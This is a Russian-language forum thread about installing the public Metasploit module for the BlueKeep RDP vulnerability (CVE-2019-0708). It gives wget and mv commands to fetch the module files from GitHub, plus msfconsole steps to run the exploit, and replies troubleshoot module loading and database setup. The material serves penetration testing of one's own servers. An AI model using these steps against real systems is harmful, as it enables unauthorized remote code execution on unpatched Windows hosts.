Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):
Bash:
cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:
Код:
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:
mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!
 
Последнее редактирование:
1591357273945.png

Подскажите как пофиксить?Вроде бы все указал правильно
1591357334761.png
 
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Коллеги, подскажите, в kali2019 модули в каком-то другом месте хранятся или что??
При запуске получаю ошибку

Код:
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[-] Failed to load module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
 
Коллеги, подскажите, в kali2019 модули в каком-то другом месте хранятся или что??
При запуске получаю ошибку

Код:
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[-] Failed to load module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
а команнду search использовать для начала
 
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
1 exploit/windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution
2 exploit/windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
3 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
 
Друже , а можно ссылочку на мануал по подключению ??? СПС.
У меня эта база вообще не установлена и не подключена . Но мета грузится без ошибок . ХЗ (((
Просто погугли, таких сайтов полно, где это описано. У тебя без базы данных не работал бы метасплоит. Значит, у тебя все автоматически установилось.
 
Просто погугли, таких сайтов полно, где это описано. У тебя без базы данных не работал бы метасплоит. Значит, у тебя все автоматически установилось.
У меня также при запросе отвечает :
msf5 > db_status
[*] postgresql selected, no connection
Но всё работает. У меня стоит обычная Дебиан 9 , я на неё сам мету воткнул. ХЗ .Всё работает без всякой базы.(((
 
У меня также при запросе отвечает :
msf5 > db_status
[*] postgresql selected, no connection
Но всё работает. У меня стоит обычная Дебиан 9 , я на неё сам мету воткнул. ХЗ .Всё работает без всякой базы.(((
serivce postgresql start
msfdb init
запускал? - эти команды ввести перед запуском msfconsole
 
Относительно тех машин, которые обновляют - не актуально. На win10 тестировал, работает только если отключить все средства защитника.... Для лабораторных условий win7sp1 при отключении файрвола работает
 
  • Нравится
Реакции: id2746 и Shinobi
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!